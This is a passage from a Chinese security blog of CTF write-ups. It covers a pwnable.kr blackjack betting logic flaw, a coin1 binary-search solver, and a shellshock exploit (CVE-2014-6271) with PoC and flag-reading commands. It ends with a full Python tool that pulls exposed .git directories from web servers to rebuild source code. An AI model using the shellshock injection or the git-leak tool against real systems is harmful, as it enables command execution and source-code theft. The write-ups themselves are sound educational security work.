     printf("\n     Because you are competing against the dealer, you must beat his hand.");
     printf("\n     BUT BEWARE!.");
     printf("\n      %c If your total goes over 21, you will LOSE!.", diamond);
     printf("\n     But the world is not over, because you can always play again.\n");
     printf("\n%c%c%c YOUR RESULTS ARE RECORDED AND FOUND IN SAME FOLDER AS PROGRAM %c%c%c\n", spade, heart, club, club, heart, spade);
     printf("\nWould you like to go the previous screen? (I will not take NO for an answer)");
     printf("\n                  (Y/N)\n                    ");
     scanf("\n%c",&choice1);
      
     while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue. Prints menu.
    { 
            system("cls");
            asktitle();
    } // End if loop
    
             
 
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, convinces user to enter yes
    {
        system("cls");
        printf("\n                 I told you so.\n");
        asktitle();
    }
     
    return;
} // End function
 
int clubcard() //Displays Club Card Image
{
     
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", club);
    printf("-------\n");
    }
     
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  J  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    }
     
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  A  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
 
             k=1;
         }
    }
     
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  Q  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  K  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;           
}// End function
 
int diamondcard() //Displays Diamond Card Image
{
     
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", diamond);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  J  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  A  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  Q  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  K  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
}// End function
 
int heartcard() //Displays Heart Card Image
{
     
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart); 
    printf("|  %d  |\n", k);
    printf("|    %c|\n", heart);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  J  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  A  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  Q  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  K  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
} // End Function
 
int spadecard() //Displays Spade Card Image
{
     
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", spade);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  J  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  A  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  Q  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  K  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
} // End Function
 
int randcard() //Generates random card
{
      
                
     srand((unsigned) time(NULL)); //Generates random seed for rand() function
     random_card = rand()%4+1;
      
     if(random_card==1)
     {   
         clubcard();
         l=k;
     }
      
     if(random_card==2)
     {
         diamondcard();
         l=k;
     }
      
     if(random_card==3)
     {
         heartcard();
         l=k;
     }
          
     if(random_card==4)
     {
         spadecard();
         l=k;
     }    
     return l;
} // End Function   
 
void play() //Plays game
{
      
     int p=0; // holds value of player_total
     int i=1; // counter for asking user to hold or stay (aka game turns)
     char choice3;
      
     cash = cash;
     cash_test();
     printf("\nCash: $%d\n",cash); //Prints amount of cash user has
     randcard(); //Generates random card
     player_total = p + l; //Computes player total
     p = player_total;
     printf("\nYour Total is %d\n", p); //Prints player total
     dealer(); //Computes and prints dealer total
     betting(); //Prompts user to enter bet amount
        
     while(i<=21) //While loop used to keep asking user to hit or stay at most twenty-one times
                  //  because there is a chance user can generate twenty-one consecutive 1's
     {
         if(p==21) //If user total is 21, win
         {
             printf("\nUnbelievable! You Win!\n");
             won = won+1;
             cash = cash+bet;
             printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
             dealer_total=0;
             askover();
         }
      
         if(p>21) //If player total is over 21, loss
         {
             printf("\nWoah Buddy, You Went WAY over.\n");
             loss = loss+1;
             cash = cash - bet;
             printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
             dealer_total=0;
             askover();
         }
      
         if(p<=21) //If player total is less than 21, ask to hit or stay
         {         
             printf("\n\nWould You Like to Hit or Stay?");
              
             scanf("%c", &choice3);
             while((choice3!='H') && (choice3!='h') && (choice3!='S') && (choice3!='s')) // If invalid choice entered
             {                                                                           
                 printf("\n");
                 printf("Please Enter H to Hit or S to Stay.\n");
                 scanf("%c",&choice3);
             }
 
 
             if((choice3=='H') || (choice3=='h')) // If Hit, continues
             { 
                 randcard();
                 player_total = p + l;
                 p = player_total;
                 printf("\nYour Total is %d\n", p);
                 dealer();
                  if(dealer_total==21) //Is dealer total is 21, loss
                  {
                      printf("\nDealer Has the Better Hand. You Lose.\n");
                      loss = loss+1;
                      cash = cash - bet;
                      printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
                      dealer_total=0;
                      askover();
                  } 
      
                  if(dealer_total>21) //If dealer total is over 21, win
                  {                      
                      printf("\nDealer Has Went Over!. You Win!\n");
                      won = won+1;
                      cash = cash+bet;
                      printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
                      dealer_total=0;
                      askover();
                  }
             }
             if((choice3=='S') || (choice3=='s')) // If Stay, does not continue
             {
                printf("\nYou Have Chosen to Stay at %d. Wise Decision!\n", player_total);
                stay();
             }
          }
             i++; //While player total and dealer total are less than 21, re-do while loop 
     } // End While Loop
} // End Function
 
void dealer() //Function to play for dealer AI
{
     int z;
      
     if(dealer_total<17)
     {
      srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function
      z=rand()%13+1;
      if(z<=10) //If random number generated is 10 or less, keep that value
      {
         d=z;
          
      }
      
      if(z>11) //If random number generated is more than 11, change value to 10
      {
         d=10;
      }
      
      if(z==11) //If random number is 11(Ace), change value to 11 or 1 depending on dealer total
      {
         if(dealer_total<=10)
         {
             d=11;
         }
          
         else
         {
             d=1;
         }
      }
     dealer_total = dealer_total + d;
     }
           
     printf("\nThe Dealer Has a Total of %d", dealer_total); //Prints dealer total
      
} // End Function 
 
void stay() //Function for when user selects 'Stay'
{
     dealer(); //If stay selected, dealer continues going
     if(dealer_total>=17)
     {
      if(player_total>=dealer_total) //If player's total is more than dealer's total, win
      {
         printf("\nUnbelievable! You Win!\n");
         won = won+1;
         cash = cash+bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
      if(player_total<dealer_total) //If player's total is less than dealer's total, loss
      {
         printf("\nDealer Has the Better Hand. You Lose.\n");
         loss = loss+1;
         cash = cash - bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
      if(dealer_total>21) //If dealer's total is more than 21, win
      {
         printf("\nUnbelievable! You Win!\n");
         won = won+1;
         cash = cash+bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
     }
     else
     {
         stay();
     }
      
} // End Function
 
void cash_test() //Test for if user has cash remaining in purse
{
     if (cash <= 0) //Once user has zero remaining cash, game ends and prompts user to play again
     {
        printf("You Are Bankrupt. Game Over");
        cash = 500;
        askover();
     }
} // End Function
 
int betting() //Asks user amount to bet
{
 printf("\n\nEnter Bet: $");
 scanf("%d", &bet);
 
 if (bet > cash) //If player tries to bet more money than player has
 {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet;
 }
 else return bet;
} // End Function
 
void askover() // Function for asking player if they want to play again
{
    char choice1;
         
     printf("\nWould You Like To Play Again?");
     printf("\nPlease Enter Y for Yes or N for No\n");
     scanf("\n%c",&choice1);
 
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue.
    { 
            system("cls");
            play();
    }
  
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, exit program
    {
        fileresults();
        printf("\nBYE!!!!\n\n");
        system("pause");
        exit(0);
    }
    return;
} // End function
 
void fileresults() //Prints results into Blackjack.txt file in program directory
{
    FILE *fpresults; //File pointer is fpresults
    fpresults = fopen(RESULTS, "w"); //Creates file and writes into it
    if(fpresults == NULL) // what to do if file missing from directory
    {
               printf("\nError: File Missing\n");
               system("pause");
               exit(1);
    }
    else
    {     
     fprintf(fpresults,"\n\t RESULTS");
     fprintf(fpresults,"\n\t---------\n");
     fprintf(fpresults,"\nYou Have Won %d Times\n", won);
     fprintf(fpresults,"\nYou Have Lost %d Times\n", loss);
     fprintf(fpresults,"\nKeep Playing and Set an All-Time Record!");
    } 
     fclose(fpresults);
     return;
} // End Function

代码有点长，但是逻辑很简单。这里我只记录造成漏洞的位置。
注意观察betting函数

int betting() //Asks user amount to bet
{
 printf("\n\nEnter Bet: $");
 scanf("%d", &bet);
 
 if (bet > cash) //If player tries to bet more money than player has
 {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet;
 }
 else return bet;
} // End Function

这个函数用来接受玩家的赌注，当赌注大于自己的金额时程序提示错误并让玩家继续输入正确的赌注，但是可以看到，这里并没有对赌注做任何检验，于是就造成了逻辑漏洞。
第一次可以输入大于cash的赌注，第二次输入100w赌注金会作为真正的赌注金，然后赢一局游戏即可getflag。

step1

Cash: $500
-------
|H    |
|  J  |
|    H|
-------

Your Total is 10

The Dealer Has a Total of 10

Enter Bet: $600

You cannot bet more money than you have.
Enter Bet: 1000000


Would You Like to Hit or Stay?
Please Enter H to Hit or S to Stay.
～～省略一万字

YaY_I_AM_A_MILLIONARE_LOL


Cash: $1000500
-------
|D    |
|  Q  |
|    D|
-------

Your Total is 10

The Dealer Has a Total of 11

Enter Bet: $

总结

要善于发现，细心。陌生的东西，当了解后也会很简单。

pwnable.kr-coin1

发表于 2018-01-24 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

这道题考察算法，很简单，用二分发即可。

分析

题目大致的意思是：
有一堆硬币，其中只有一个假硬币，真硬币重10，假硬币重9。服务端会给出硬币数目（N）和询问重量的次数（C），每次询问给出要询问重量的硬币的索引，多个用空格隔开。然后服务端会返回询问的总重量。你必须在所有次数用完之后给出假硬币的索引，正确继续答题，错误则直接结束。当找出100个假硬币后会给出flag，限时30秒。

由于网络较差，根据题目建议可以直接在他的服务器上运行代码。直接找一个原来题目的ssh地址，连上去就行了。然后把代码传到/tmp目录下运行即可。
最后贴出exp

#!/usr/bin/env python
# coding=utf-8

from socket import *

def getNC(s):
    tmp = s.split(' ')
    N = int(tmp[0][2:])
    C = int(tmp[1][2:].strip('\n'))
    return N,C

def work():
    sock = socket(AF_INET,SOCK_STREAM)
    sock.connect(('127.0.0.1',9007))
    print sock.recv(2048)
    for i in xrange(100):
        s = sock.recv(100)
        print '{}. {}'.format(i,s)
        N,C = getNC(s)
        left = 0
        right = N-1
        mid = (right+left)/2
        for j in xrange(C):
            coins = [str(n) for n in xrange(left,mid+1)]
            coins = ' '.join(coins)
            #print coins
            sock.send(coins+'\n')
            weit = int(sock.recv(100))
            #print weit
            if weit != (mid-left+1)*10:
                right = mid
                left = left
                mid = (right+left)/2
            else:
                left = mid+1
                right = right
                mid = (right+left)/2
        print '   answer is {}!'.format(left)
        sock.send(str(left)+'\n')
        print '   '+sock.recv(100)
    print sock.recv(1024)
    
work()

98. N=734 C=10

   answer is 220!
   Correct! (98)

99. N=93 C=7

   answer is 7!
   Correct! (99)

Congrats! get your flag
b1NaRy_S34rch1nG_1s_3asy_p3asy

shellshock@ubuntu:/tmp$

总结

这提考察的算法虽然很简单，但是当时还是写了半天，抽时间好好加强一下算法功底，比如多做做ACM的题目。

pwnable.kr-shellshock

发表于 2018-01-24 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

这题考察著名漏洞的利用，就是当年被评为10级严重的“破壳”漏洞。当时确实不知道，上网搜的。

分析

贴出shellshock.c的源码

#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

程序首先使用setreuid和setregid调用分别设置了三个ID都为getegid而这个调用获取的有效组id标识的是组shellshock_pwn,这通过执行ls -l就可以看到。

shellshock@ubuntu:~$ ls -l
total 960
-r-xr-xr-x 1 root shellshock     959120 Oct 12  2014 bash
-r--r----- 1 root shellshock_pwn     47 Oct 12  2014 flag
-r-xr-sr-x 1 root shellshock_pwn   8547 Oct 12  2014 shellshock
-r--r--r-- 1 root root              188 Oct 12  2014 shellshock.c
shellshock@ubuntu:~$

这个组是有读取flag的权限的，这样程序在后续就有权限执行flag的读取操作。于是在利用bash的“破壳”漏洞即可getflag

知识点

Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞，向环境变量值内的函数定义后添加多余的字符串会触发此漏洞，攻击者可利用此漏洞改变或绕过环境限制，以执行任意的shell命令,甚至完全控制目标系统

受到该漏洞影响的bash使用的环境变量是通过函数名称来调用的，以“(){”开头通过环境变量来定义的。而在处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令。这个漏洞导致了CVE-2014-6271，CVE-2014-7169，CVE-2014-6277，CVE-2014-6278，CVE-2014-7186，CVE-2014-7187六个CVE的爆发。

对于该漏洞的详细描述网上到处都有，就不再多说。可以使用下面的poc验证是否存在漏洞：

1	env x='() { :;}; echo Shellshock' bash -c "exit"

存在的话会输出shellshock这段话。

利用

知道了漏洞，那么利用就很简单了。根据题目使用下面的exp

1	env f='() { :;};bash -c "cat flag"' ./shellshock

1
2
3

shellshock@ubuntu:~$ env f='() { :;};bash -c "cat flag"' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

需要注意的是，直接执行cat flag会提示找不到文件或目录，要用bash命令来执行才可以。（原因我也不知道。。。）

总结

又学到了一个知名漏洞的利用，同时也发现自己知道的真的太少了，要好好学习才行。

git目录泄漏利用工具

发表于 2018-01-22 | 更新于 2018-08-04 | 分类于 WEB安全 | 评论数：

前言

说找时间写，今天终于动手来写一波有关漏洞利用工具的博文。
git目录泄漏导致了源码泄漏，是一种很严重的过失。说是过失是因为它其实很容易避免。其实在ctf比赛中还是遇到过很多这样的题型，只要能把整个目录中的重要文件下载下来就可以了，那么怎样下载，就是下面要写的了。

知识点

要想下载git目录首先要知道这个目录下的文件都有啥含义。

hooks:这个目录存放一些shell脚本，可以设置特定的git命令后触发相应的脚本；在搭建gitweb系统或其他git托管系统会经常用到hook script
info:包含仓库的一些信息
logs:保存所有更新的引用记录
objects:所有的Git对象都会存放在这个目录中，对象的SHA1哈希值的前两位是文件夹名称，后38位作为对象文件名
refs:这个目录一般包括三个子文件夹，heads、remotes和tags，heads中的文件标识了项目中的各个分支指向的当前commit
COMMIT_EDITMSG:保存最新的commit message，Git系统不会用到这个文件，只是给用户一个参考
config:这个是GIt仓库的配置文件
description:仓库的描述信息，主要给gitweb等git托管系统使用
index:这个文件就是我们前面提到的暂存区（stage），是一个二进制文件
HEAD:这个文件包含了一个档期分支（branch）的引用，通过这个文件Git可以得到下一次commit的parent
ORIG_HEAD:HEAD指针的前一个状态

上面的内容网上很多，可以多了解了解。还有git的基本操作如果都理解的话就可以进行下面的内容了。

分析利用方法

其实git目录中是没有源码的明文，也就是说要得到源码，还要使用git命令进行转换的。而且，只要能下载到对象文件就可以了。我有两种想法。

一般情况下，在暂存区中记录的对象包含了大部分想要获得的文件，说大部分是因为可能有一部分被删除了。所以只分析index文件可能会漏掉一些。
还有一种是分析logs/HEAD文件，这个文件记录了仓库从创建到最后所有的提交记录以及分支变换等等的记录。但是它并不记录git add .等的添加命令，也就是说没有提交的对象分析不到。但是它会记录已经删除的文件和不同版本的文件。
鉴于两种方法的互补，可以按照两种方法分别写出程序，在没有头绪之时考虑是否是方法的弊端导致的漏掉文件。
源码

# coding:utf-8
# python2
import os,sys
try:
    import requests
except:
    print 'Lost "requests" Module.\nyou can execute "pip install requests" to install this module.'
    exit(1)

class GitHack:
    #params->hosturl: 远程git仓库url，如：http://url/.git/
    #       ->rootdir: 本地会在这个目录建立git版本库
    def __init__(self,hosturl,rootDir='githack'):
        self.host = hosturl.strip('/')+'/'
        self.dir = rootDir

        if not os.path.exists(rootDir):
            os.makedirs(rootDir)
        os.chdir(rootDir)
        os.popen('git init')

    def getFile(self,urlpath):
        '''
        功能：从指定的相对url中获取文件，并存储在本地（使用相同的相对路径）
        参数：urlpath是文件相对于self.host的路径
        注意：本函数会检查目录路径是否存在，只捕获reqeusts.get的异常
        '''
        try:
            r = requests.get(self.host+urlpath)
        except:
            print 'Error!the {} requests failed!'.format(self.host+'.git/'+urlpath)
            return False
        if r.status_code == 404:
            print 'Error!no such file {}'.format(urlpath)
            return False
        a = urlpath.rfind('/')
        if -1 != a:
            if not os.path.exists('.git/'+urlpath[:a]):
                os.makedirs('.git/'+urlpath[:a])
        f = open('.git/'+urlpath,'w')
        f.write(r.content)
        r.close()
        f.close()
        print 'Download file {} ok!'.format(urlpath)
        return True

    def fromIndex(self):
        '''
        功能：还原暂存区的对象
        '''
        self.getFile('index')
        rst = os.popen('git ls-files --stage').readlines()
        queryDic = {}
        sucDic = {}
        for i in rst:
            a = i.find(' ')
            b = i.rfind(' ')
            c = i.rfind('\t')
            queryDic[i[a+1:b]] = i[c+1:-1]
        for f in queryDic:
            if(self.getFile('objects/{}/{}'.format(f[:2],f[2:]))):
                sucDic[f] = queryDic[f]
        return sucDic

    def fromLogs(self):
        '''
        功能：从logs/HEAD文件开始，还原所有对象
        '''
        self.getFile('index')
        self.getFile('logs/HEAD')
        self.getFile('HEAD')
        self.getFile('refs/heads/master')
        logs = []
        queryList = []
        sucDic = {}
        with open('.git/logs/HEAD','r') as f:
            logs = f.readlines()
        for l in logs:
            a = l.find(' ')
            queryList.append(l[a+1:a+1+40])
        for f in queryList:
            if self.getFile('objects/{}/{}'.format(f[:2],f[2:])):
                #tree
                s = os.popen('git cat-file -p {}'.format(f)).readlines()[0]
                s = s[5:-1]
                sucDic.update(self.__getTree(s))
        return sucDic

    def __getTree(self,f,prefix=''):
        '''
        功能：递归获取指定tree类型对象下的所有blob对象
        参数：f 是指定对象的sha1值，他应该是tree类型
        prefix 是前一个tree对象对应的目录，它使用来还原文件的原始路径的。类似于 objects/
        
        '''
        sucDic = {}
        if self.getFile('objects/{}/{}'.format(f[:2],f[2:])):
            for i in os.popen('git cat-file -p {}'.format(f)).readlines():
                d = i.find(' ')+1
                if 'tree' == i[d:d+4]:
                    a = i.find('tree')+5
                    b = i.rfind('\t')
                    sucDic.update(self.__getTree(i[a:b],prefix+i[b+1:-1]+'/'))
                    continue
                
                a = i.find('blob')+5
                b = i.rfind('\t')
                if self.getFile('objects/{}/{}'.format(i[a:a+2],i[a+2:b])):
                    sucDic[i[a:b]] = prefix+i[b+1:-1]
        return sucDic

    def saveFile(self,sucDic):
        '''
        功能：根据sucDic获取文件的内容,他并不是必要的函数，他只是将所有blob对象还原成文件
        参数：sucDic类似于{'111...1':'1.txt'}键为对象sha1值，值为对应文件名路径
        '''
        for i in sucDic:
            text = os.popen('git cat-file -p {}'.format(i)).read()
            #mkdir
            a = sucDic[i].rfind('/')
            if(-1 != a):
                if not os.path.exists(sucDic[i][:a]):
                    os.makedirs(sucDic[i][:a])
            f = open(sucDic[i],'w')
            f.write(text)
            f.close()
            print 'save file {}.'.format(sucDic[i])

def usage():
    print '''usage:python githack.py hosturl [rootdir] [fromlogs]
                    params：hosturl为包含git目录的url
                            rootdirgit目录会下载到该目录
                            fromlogs可以为任意值即可变为第二个模式。
                    本脚本有两个模式（默认1）：1.下载暂存区的文件。2.从logs中遍历所有对象'''

def main():
    '''
    没怎么处理异常，也没美化命令行，有时间做
    '''
    log = False
    if len(sys.argv)==3:
        rootdir = sys.argv[2]
    elif len(sys.argv)==2:
        rootdir = 'githack'
    elif len(sys.argv)==4:
        log = True
    else:
        usage()
        return
    g = GitHack(sys.argv[1],rootdir)
    if log:
        print 'from Logs mod!'
        sucDic = g.fromLogs()
    else:
        print 'from index mod!'
        sucDic = g.fromIndex()
    #print sucDic
    print ''
    g.saveFile(sucDic)

main()

源码也可以到我的码云上下载我的githack

总结

这个工具很早之前就有简洁版本，现在重新写了一遍，对git工具的使用和git目录又熟悉了不少。虽然网络上早有此类工具，但自己写出来还是有不少感悟，以后多写多练。

r00tnb

努力学习网络安全技术，喜欢二进制，一直努力但进步甚微。

GitHub E-Mail